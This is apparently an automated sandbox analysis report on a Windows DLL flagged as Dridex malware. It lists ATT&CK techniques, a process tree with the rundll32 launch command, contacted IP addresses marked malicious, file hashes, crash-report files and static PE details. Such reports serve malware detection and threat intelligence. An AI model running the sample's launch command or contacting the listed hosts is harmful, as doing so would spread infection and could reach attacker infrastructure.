      Source: WerFault.exe, 00000009.00000002.746321633.0000000004E6C000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: WerFault.exe, 00000009.00000002.746926254.0000000005500000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\0f72be74_by_Libranalysis.dll',#1Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10006D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,2_2_10006D50

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection11Virtualization/Sandbox Evasion1Input Capture1Security Software Discovery21Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection11LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 413060 Sample: 0f72be74_by_Libranalysis.dll Startdate: 13/05/2021 Architecture: WINDOWS Score: 72 17 162.241.209.225 UNIFIEDLAYER-AS-1US United States 2->17 19 82.209.17.209 PODA-ASCZ Czech Republic 2->19 21 43.229.206.212 INET-AS-IDPTInetGlobalIndoID Indonesia 2->21 23 Found malware configuration 2->23 25 Multi AV Scanner detection for submitted file 2->25 27 Yara detected Dridex unpacked file 2->27 29 2 other signatures 2->29 9 loaddll32.exe 1 2->9         started        signatures3 process4 process5 11 cmd.exe 1 9->11         started        process6 13 rundll32.exe 11->13         started        process7 15 WerFault.exe 23 9 13->15         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      0f72be74_by_Libranalysis.dll36%ReversingLabsWin32.Trojan.Convagent
      0f72be74_by_Libranalysis.dll100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      2.2.rundll32.exe.2d80000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      82.209.17.209
      unknownCzech Republic
      30764PODA-ASCZtrue
      162.241.209.225
      unknownUnited States
      46606UNIFIEDLAYER-AS-1UStrue
      43.229.206.212
      unknownIndonesia
      24532INET-AS-IDPTInetGlobalIndoIDtrue

      General Information

      Joe Sandbox Version:32.0.0 Black Diamond
      Analysis ID:413060
      Start date:13.05.2021
      Start time:07:25:20
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 40s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:0f72be74_by_Libranalysis.dll
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:20
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal72.troj.winDLL@6/4@0/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 57% (good quality ratio 49.3%)
      • Quality average: 67.4%
      • Quality standard deviation: 35.7%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 2
      • Number of non-executed functions: 9
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Sleeps bigger than 120000ms are automatically reduced to 1000ms
      • Found application associated with file extension: .dll
      • Stop behavior analysis, all processes terminated

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      82.209.17.2092a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
        7587f225_by_Libranalysis.dllGet hashmaliciousBrowse
          e3429d75_by_Libranalysis.dllGet hashmaliciousBrowse
            8b521700_by_Libranalysis.dllGet hashmaliciousBrowse
              94a4d66c_by_Libranalysis.dllGet hashmaliciousBrowse
                a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                  4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                    0f72be74_by_Libranalysis.dllGet hashmaliciousBrowse
                      cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                        2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                          86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                            fe1d4238_by_Libranalysis.dllGet hashmaliciousBrowse
                              13f88d67_by_Libranalysis.dllGet hashmaliciousBrowse
                                4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                  a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                    cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                      4e021da2_by_Libranalysis.dllGet hashmaliciousBrowse
                                        27c06d28_by_Libranalysis.dllGet hashmaliciousBrowse
                                          86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                            6bea48e8_by_Libranalysis.dllGet hashmaliciousBrowse
                                              162.241.209.2252a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                7587f225_by_Libranalysis.dllGet hashmaliciousBrowse
                                                  e3429d75_by_Libranalysis.dllGet hashmaliciousBrowse
                                                    8b521700_by_Libranalysis.dllGet hashmaliciousBrowse
                                                      94a4d66c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                        a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                          4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                            0f72be74_by_Libranalysis.dllGet hashmaliciousBrowse
                                                              cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                  86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                    fe1d4238_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                      13f88d67_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                        4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                          a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                            cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                              4e021da2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                27c06d28_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                  86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                    6bea48e8_by_Libranalysis.dllGet hashmaliciousBrowse

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                      PODA-ASCZ2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      7587f225_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      e3429d75_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      8b521700_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      94a4d66c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      0f72be74_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      fe1d4238_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      13f88d67_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      4e021da2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      27c06d28_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      6bea48e8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 82.209.17.209
                                                                                      UNIFIEDLAYER-AS-1US2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      7587f225_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      e3429d75_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      8b521700_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      94a4d66c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      0f72be74_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      2a71d07d_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      fe1d4238_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      13f88d67_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      4bfaad72_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      a194019c_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      cdc733ac_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      4e021da2_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      27c06d28_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      86fa0c16_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225
                                                                                      6bea48e8_by_Libranalysis.dllGet hashmaliciousBrowse
                                                                                      • 162.241.209.225

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_41fa1884768d4e739447e9cfb8aa8e7080fe54_82810a17_173d2041\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):12482
                                                                                      Entropy (8bit):3.7659692206552324
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:8Vesiy40oXs0cHBUZMX4jed+gG/u7sFS274ItWcG:bsiy+XsPBUZMX4jes/u7sFX4ItWcG
                                                                                      MD5:7C23390373D50625C670AAB9C4F09683
                                                                                      SHA1:9E5C5B76B6246408C7BFB4CCD5F170C7E5B37EB7
                                                                                      SHA-256:859EF2D1F8BD51079F9D94ECAF4B31443D3CB1D9DFB58BB27BD840E2E3A01CEC
                                                                                      SHA-512:E1CD62639BB78643100B682BCEEA3993199EB098FCF85C0BF403688DF838981B6B1786128949A2F130FA5F4783021A8D9A49ED86773AF48CE43EEF14109AEFA7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.5.3.5.7.2.0.6.7.4.9.0.0.4.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.5.3.5.7.2.1.1.1.8.6.4.9.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.1.f.8.f.5.3.-.6.1.a.e.-.4.e.d.7.-.9.f.f.6.-.2.6.5.d.f.9.3.5.2.d.7.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.f.3.7.d.d.e.-.7.2.7.e.-.4.5.5.b.-.9.0.9.e.-.9.c.3.0.3.f.f.0.f.3.b.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.0.4.-.0.0.0.1.-.0.0.1.b.-.5.8.d.1.-.d.f.7.d.b.8.4.7.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER10D2.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4663
                                                                                      Entropy (8bit):4.473335838513819
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsEJgtWI9p1WSC8B28fm8M4JCdshNrFw+q8/4NF2r04SrS6d:uITfC2ESNNJXNSnNFDW6d
                                                                                      MD5:43F22E3D547CACD3ED45C9B39170876C
                                                                                      SHA1:B246188AD45F0D6169E7633E66D285D90AEC392B
                                                                                      SHA-256:99B0D66C49F15BB6D4F43E93EAA743A2D5F4E5A2016B381CB3CA1ED32B40D5F6
                                                                                      SHA-512:C33ADF2EA1ACCF578E0DF071818F08F8BF666E80BE7456D266D04E7CA7DF5C195A6DCE0AA904CF7DFA45016D12B3230D06FF54D5C15CB578FB70D87B79317C94
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="987277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER7D7.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 14 streams, Thu May 13 05:26:48 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):40502
                                                                                      Entropy (8bit):2.274737414765593
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:SSZXEbfO3J0f8k2HsUTOTjyBWMR/sx43a73UHcvw:mfMNKyBDy43a7zY
                                                                                      MD5:78C891E667F2EFE55ACAF13811962155
                                                                                      SHA1:96D94CD2CDBFA556F9FBFC27ECE29C59E9BB96D0
                                                                                      SHA-256:FC6DA0EF1FA472B473F42B5225A3D34954C156C7AC9B54B26096CF7DEB02C317
                                                                                      SHA-512:50C6637D0292C9644698651FE60B73A596D7FE7C79CB47FD94DFFA208B417A7E686E82D7632EAC575EB7C6E7C162CCCF820076E5F1CD944FCDB239EAD286BFFE
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: MDMP....... ..........`...................U...........B......x.......GenuineIntelW...........T...........v..`.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE6F.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8294
                                                                                      Entropy (8bit):3.6943146591652454
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNirN6Yw6YH46vygmfTlVSPQ+pru89bxbsfxK7m:RrlsNix6f6YY6vygmfTvSTxgfZ
                                                                                      MD5:E5F352DDC7C6E68D15E7BE7523397E2F
                                                                                      SHA1:F7EB2F092FCDDF5A526770F80D67B5E8ABB35787
                                                                                      SHA-256:EB8AD01817FB453C4C3887057AA917DA3601CF1434AA02377F838ABDAA1C7017
                                                                                      SHA-512:F017FD03434F4B598D60DB139D863244501EE0BABE999000E5196014FC2EC2AEA126480ECCFBD97E79EBD42388A9B9A6C1D121E69997F3F1132B395F5F1D1BB1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.6.0.<./.P.i.d.>.......

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.513868857555084
                                                                                      TrID:
                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:0f72be74_by_Libranalysis.dll
                                                                                      File size:167424
                                                                                      MD5:0f72be74fa3f62cdc228d4c3b5d84406
                                                                                      SHA1:66925350b9c8d0919d6eebd6efeab17edac1a3cd
                                                                                      SHA256:3078512d8dc5547c01c07d044be234a69e79456b0480d9c6d8cbf5354b52021e
                                                                                      SHA512:ce6dace2f465a9886aed7d7f6a099f33d1eeb29acdef9d2ed71be0cff745d866ca9baf1fb4447ce539eeb833e588c33a74f436931c3ae70ddc326bef75d002d4
                                                                                      SSDEEP:3072:d9F/oNrQb4xVubbXP/NTccbsFvCeLmXH57V30e8Pj:d9F6rQXvFczvYpQP
                                                                                      File Content Preview:MZ......................@...................................\...........!..L.!This program cannot be run in DOS mode....$.......Xm.o...<...<...<.U!<...<..B<r..<...<...<rQ!<...<;..<...<;..<3..<au.<...<szt<"..<Rich...<.......................................

                                                                                      File Icon

                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x10024cc0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x10000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x609C8024 [Thu May 13 01:25:56 2021 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:0
                                                                                      File Version Major:5
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:88962f6760ea005847fb88b87e8ce1fd

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      mov eax, 00000000h
                                                                                      cmpss xmm1, xmm2, 03h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      mov edx, 00000000h
                                                                                      cmpss xmm1, xmm2, 03h
                                                                                      cmp eax, 02h
                                                                                      mov eax, ebp
                                                                                      mov dword ptr [10029734h], eax
                                                                                      mov eax, ebx
                                                                                      mov dword ptr [10029730h], eax
                                                                                      mov eax, esi
                                                                                      mov dword ptr [10029728h], eax
                                                                                      jne 00007FA444925EB6h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h
                                                                                      mov eax, 00000000h

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [RES] VS2015 build 23026
                                                                                      • [IMP] VS2013 UPD4 build 31101
                                                                                      • [ C ] VS2010 build 30319
                                                                                      • [RES] VS2015 UPD2 build 23918
                                                                                      • [C++] VS2005 build 50727
                                                                                      • [IMP] VS2010 SP1 build 40219
                                                                                      • [RES] VS2012 build 50727

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x2770a0x5b.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x277d80x59.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x3a0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2d0000x1220
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x100180x38.text
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x250000x4c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x23dfe0x23e00False0.756362968206data7.53078515147IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x250000x2ceb0x2c00False0.753728693182data7.42331753213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
